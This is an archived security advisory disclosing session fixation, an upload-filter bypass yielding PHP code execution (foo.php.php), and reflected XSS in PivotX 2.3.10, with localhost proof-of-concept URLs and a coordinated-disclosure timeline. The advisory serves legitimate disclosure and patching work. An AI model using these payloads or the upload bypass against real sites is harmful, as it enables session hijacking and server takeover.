exploit the possibilities

PivotX 2.3.10 Session Fixation / XSS / Code Execution

PivotX 2.3.10 Session Fixation / XSS / Code Execution
Posted Jun 28, 2015
Authored by Tim Coen

PivotX version 2.3.10 suffers from session fixation, code execution, and cross site scripting vulnerabilities.

tags | exploit, vulnerability, code execution, xss
MD5 | cefa8f451d24090e8e34f2127420d1cb

PivotX 2.3.10 Session Fixation / XSS / Code Execution

Change Mirror Download
Vulnerability: Session Fixation, Reflected XSS, Code Execution
Affected Software: PivotX (http://pivotx.net/)
Affected Version: 2.3.10 (probably also prior versions)
Patched Version: 2.3.11
Risk: Medium-High


Session Fixation
================

Risk
----

Medium; If victim clicks link and logs in, then an attacker can log in
as the victim

POC
---

1. Send victim to:
http://localhost/pivotx_latest/pivotx/fileupload.php?sess=123
2. Victim logs in
3. Attacker sets PHPSESSID=123 and is now logged in as well


File Upload: Code Execution
===========================

Risk
----

Medium; attacker can upload PHP files and thus gain code execution

Description
-----------

It is possible to bypass the check for disallowed file extensions with
a filename like foo.php.php, which will be renamed to foo.php_.php,
leading to code execution.


Reflected XSS
=============

Risk
----

Medium; arbitrary JavaScript execution

POC
---

PHP_SELF is user supplied, and thus should not be considered
secure. It seems that most or all forms are affected by this.


http://localhost/pivotx_latest/pivotx/index.php/"><script>alert('xsstest')</script></script>?page=page&uid=3

http://localhost/pivotx_latest/pivotx/index.php/"><script>alert('xsstest')</script></script>?page=templates

http://localhost/pivotx_latest/pivotx/index.php/"><script>alert('xsstest')</script></script>?page=fileexplore
[... etc ...]

Timeline
========

2015-05-27: Initial Report
2015-05-27: Vendor Confirmation
2015-06-05: Asking for Progress Update (no reply)
2015-06-14: Setting Disclose Date
2015-06-15: Vendor Confirmation
2015-06-17: Vendor Send Fix, Asking for Confirmation
2015-06-17: Confirmed Fix
2015-06-21: Vendor Releases Fix
2015-06-27: Disclosure

Source
======

http://software-talk.org/blog/2015/06/session-fixation-xss-code-execution-vulnerability-pivotx/
Login or Register to add favorites

File Archive:

January 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    4 Files
  • 2
    Jan 2nd
    3 Files
  • 3
    Jan 3rd
    3 Files
  • 4
    Jan 4th
    33 Files
  • 5
    Jan 5th
    31 Files
  • 6
    Jan 6th
    21 Files
  • 7
    Jan 7th
    15 Files
  • 8
    Jan 8th
    19 Files
  • 9
    Jan 9th
    1 Files
  • 10
    Jan 10th
    1 Files
  • 11
    Jan 11th
    33 Files
  • 12
    Jan 12th
    19 Files
  • 13
    Jan 13th
    27 Files
  • 14
    Jan 14th
    8 Files
  • 15
    Jan 15th
    16 Files
  • 16
    Jan 16th
    1 Files
  • 17
    Jan 17th
    2 Files
  • 18
    Jan 18th
    20 Files
  • 19
    Jan 19th
    32 Files
  • 20
    Jan 20th
    12 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close